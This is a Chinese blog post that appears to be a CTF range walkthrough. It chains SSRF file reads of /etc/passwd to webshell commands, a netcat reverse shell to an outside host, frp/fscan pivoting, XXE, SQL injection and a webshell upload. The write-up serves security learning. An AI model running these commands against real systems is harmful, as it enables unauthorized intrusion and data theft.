渗透测试案例

最新推荐文章于 2024-08-30 22:17:40 发布
最新推荐文章于 2024-08-30 22:17:40 发布
阅读量417 收藏 3
点赞数 5
分类专栏: BugKu 文章标签: java 前端 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq274575499/article/details/139620365
版权

靶场

测试

file:///etc/passwd

获取网站的内网地址

file:///etc/hosts

获取flag

file:///flag

XSS

<script>alert(123)</script>

2、使用BP进行抓包爆破,功能类似于扫描内网了,获取了同网段的几个存活网站。

修改url=file%3A%2F%2F%2Fetc%2Fhosts为url=192.168.0.1

send to intruder修改“1”为变量

192.168.0.10的网站显示被黑了

测试是shell.php文件

http://192.168.0.10/shell.php

可以使用cmd执行命令http://192.168.0.10/shell.php?cmd=ls,找到flag

查看flag,http://192.168.0.10/shell.php?cmd=cat flag

3、查看网站目录http://192.168.0.10/shell.php?cmd=ls / 又看到一个flag

查看看个flag,http://192.168.0.10/shell.php?cmd=cat /flag

4、通过http://192.168.0.10/shell.php?cmd=nc xx.xx.xx.xx PORT -e /bin/sh反弹shell

之后,上传fscan对内网进行扫描,由于权限问题,在使用fscan的时候要加上np参数。

使用ssrf还是有些不方面,使用frp做个内网的穿透,记住网站服务器是frpc端,自己的VPS是frps端

这样挂上frp的socks代理就可以本机访问内网了,

结合fscan的结果对内网进行继续渗透,

http://192.168.0.250这个网站,用burp查看数据包的时候,顺便扫描了一下,结果发现存在xxe。

对网站的两个位置进行获取,获取了两个flag

flag{e69bffb4798654f32af867a884d90f9c}

flag{53a45639120b277af78afd63ff157d07}

对192.168.0.138网站进行渗透,发现是一个存在联合注入的网站,直接通过查询得到flag。

对192.168.0.0网段进行探测,没有新的发现了,试试了10段,发现了新的网站

通过弱口令可以登录后台

在文件管理这个地方,可以直接上传木马,这里直接上传了一个小马

获取相关flag

QYpiying
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2024年信息安全管理与评估竞赛——Web服务器渗透测试案例②解析(含环境)
旺仔Sec&blog
03-17 320
在 A 集团的网络中存在几台服务器,各服务器存在着不同业务服务。在网络中存在着 一定网络安全隐患,请利用你所掌握的渗透测试技术,通过信息收集、漏洞挖掘等渗透测 试技术,完成指定项目的渗透测试,在测试中获取 flag 值。
“不一样”的真实渗透测试案例分析
HBohan的博客
07-26 2589
前言 本文是由一次真实的授权渗透案例引申而出的技术分析和总结文章。在文章中我们会首先简单介绍这次案例的整体渗透流程并进行部分演绎,但不会进行详细的截图和描述,一是怕“有心人”发现端倪去目标复现漏洞和破坏,二是作为一线攻击人员,大家都明白渗透过程也是一个试错过程,针对某一个点我们可能尝试了无数种方法,最后写入文章的只有成功的一种,而这种方法很有可能也是众所周知的方法。因此我们只会简单介绍渗透流程,然后提取整个渗透过程中比较精华的点,以点及面来进行技术分析和探讨,望不同的人有不同的收获。 白嫖的福音网安学习资.
GraphQL渗透测试案例及防御办法
weixin_42075643的博客
08-31 2904
GraphQL渗透测试案例及防御办法
安全渗透测试案例
xianjie0318的博客
05-25 7441
一次完整的安全渗透测试   网络渗透测试就是利用所有的手段进行测试,发现和挖掘系统中存在的漏洞,然后撰写渗透测试报告,将其提供给客户;客户根据渗透人员提供的渗透测试报告对系统存在漏洞和问题的地方进行修复和修补, 本次渗透测试算是针对aspx类型的网站系统的一个补充。下面是整个渗透过程和一些渗透思路,写出来跟大家一起探讨和分享,不到之处请指正。   (一)初步的安全渗透测试 1.
第18节 渗透测试流程和简单案例
Fighting_hawk的博客
12-19 4576
本节主要围绕网络渗透流程这一主题,从概述入手介绍主要步骤,随后对每个步骤采用一个小实验进行讲解分析。
实战项目 2 Linux-XXE 靶场渗透测试案例详解
m0_50572593的博客
06-21 2076
​ XXE(xml external entity injection) 既"xml 外部实体注入漏洞"。概括一下就是"攻击者通过向服务器注入指定的 xml 实体内容,从而让服务器按照指定的配置进行执行,导致问题“也就是说服务端接收和解析了来自用户端的 xml 数据,而又没有做严格的安全控制,从而导致 xml 外部实体注入。造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起 dos 攻击等危害。
基于云资产渗透测试案例分享.pdf
08-08
Case 1: 从Web漏洞到资产下 载 ...安全专家于波带来的《基于云资产的渗透测试实例分享》,通过四个案例和一些小技巧,case by case 学习,给观众们带来步骤详细清晰的的实战经验,手把手解析,打开渗透测试的新思路。
Trollcave渗透测试案例.xmind
11-25
Trollcave渗透测试案例.xmind
渗透测试学习笔记之案例二.pdf
04-06
渗透测试学习笔记
Java基础(6)- Java代码笔记3
weixin_47062560的博客
08-30 465
数据类型[][] 数组名 = new 数据类型[m][n]数据类型 数组名[][] = new 数据类型[m][n]数据类型[] 数组名[] = new 数据类型[m][n]m:代表二维数组长度n:代表二维数组中每个一维数组的长度。
启动Application 报错:no mapping for GET /(已解决)
qq_3512323979的博客
08-26 5395
no mapping for GET /因为我使用的是框架嘛,然后生成了一个SpringBoot项目后,resources下面就会有一个static的类,用于存放静态资源类,后面我把静态资源放在里面,但是启动启动类后,报错一直匹配不到。: 正常的话,我们使用SpringBoot框架,他会给我们提供许多便利,包括静态资源的自动服务,默认的话,他会去。报这个错可能还有其他原因,我的是因为这个,大家可以根据日志信息一步步检查,肯定可以解决的!类并覆盖其方法时,就会失去静态资源的自动服务
[C++规范] 访问类成员变量的方式:直接访问还是通过成员函数访问?
Loewen丶的小窝
08-26 5601
在面向对象编程(OOP)中,通过成员函数(如`ME_HardwareTypeEnum Type() const;` 和 `int Id() const;`)来访问类的私有或受保护成员(如`m_hardwareType` 和 `m_id`),而不是直接通过公共成员访问,是一种更好的做法。
操作系统原子操作
zzt_is_me的博客
08-28 3551
所谓的原子操作就是不可被拆分的操作,对于多线程对全局变量进行操作时,就再也不用再线程锁了,和pthread_mutex_t保护作用是一样的,也是线程安全的,有些编译器在使用时需要加-march=i686编译参数。2、type只能是整数相关的类型,浮点型和自定义类型无法使用。功能:把value赋值给*ptr,并返回*ptr的旧值。功能:以上操作返回的是*ptr与value计算后的值。使用原子操作实现一个线程安全的无锁队列。1、该功能并不通用,有些编译器不支持。功能:以上操作返回的是*ptr的旧值。
Spring WebFlux – CVE-2023-34034 – 撰写和概念验证
技术超强的网络安全平台
08-28 2236
Spring框架是一个广泛使用的基于Java的应用程序框架,为企业级Java应用的开发提供基础设施支持。是一个功能强大的身份验证和访问控制框架,也是保护基于 Spring 的应用程序的行业标准。它提供身份验证和授权,并且可以轻松扩展以满足自定义要求。Spring WebFlux是在 Spring 5 中引入的,作为传统框架的响应式编程替代方案。Spring WebFlux 的核心设计旨在处理异步、非阻塞和反应式编程范例。它提供了一种反应式编程模型,允许开发人员构建可扩展、响应迅速且具有弹性的应用程序。
基于jenkins部署maven项目
静水深流
08-26 2941
如上所示,构建后,我们处于项目的根目录之下,可以进行后续的操作,如启动target目录下的jar包、将jar包传输到需要部署的服务器上、打docker镜像bing上传等等,需要根据实际情况进行选择,而这些都可以在“Add post-build step”选项中进行选择。我们主要关注上述几个部分,在General部分,可以对项目进行一个简单的描述,源码管理部分,需要配置对应的源码url,如下图所示。如上所示,选择“构建一个maven项目”,如果没有改选项,则需要安装maven构建的插件,请参考之前的文章。
输入三个正整数,找出不大不小的值
laocooon的博客
08-30 459
/ 找出最大值,找出最小值,然后不是最大值也不是最小值的。// 2、输入三个正整数,找出不大不小的值。
死锁及其产生条件
秋夫人
08-26 1613
死锁是指两个或多个线程(或进程)互相等待对方释放资源,导致所有相关线程都无法继续执行的情况。这是并发编程中的一个常见问题,可能会导致系统部分或完全停止响应。
JVM 内存参数
iOS逆向与安全
08-29 821
它屏蔽了与具体操作系统平台相关的信息,使Java程序只需生成在Java虚拟机上运行的目标代码(字节码),就可以在各种平台上不加修改的运行。‌例如,‌可以将最小堆内存设置为2GB(‌-Xms2048m)‌,‌最大堆内存设置为4GB(‌-Xmx4096m)‌。如果初始化的高水位线设置过低,会频繁的触发Full GC,高水位线会被多次调整。一般来说,垃圾回收器都会有默认的对象晋升到老年代的年龄参数阈值,CMS默认是6,G1默认是15,不过这参数值也不是一成不变的,它会根据动态年龄判断规则来重新被赋值。
SpringBoot SSM vue在线作业考试系统
最新发布
yinjl123456的博客
08-30 158
使用技术: SpringBoot或SSM + Mybaits + Mysql + vue(前端)后台管理 登录注册 个人中心 教师信息管理 学生信息管理 学院信息管理 专业信息管理。班级信息管理 作业信息管理 作业提交管理 通知公告管理 试卷管理 试题管理。系统管理 管理员管理 考试管理。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

QYpiying

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值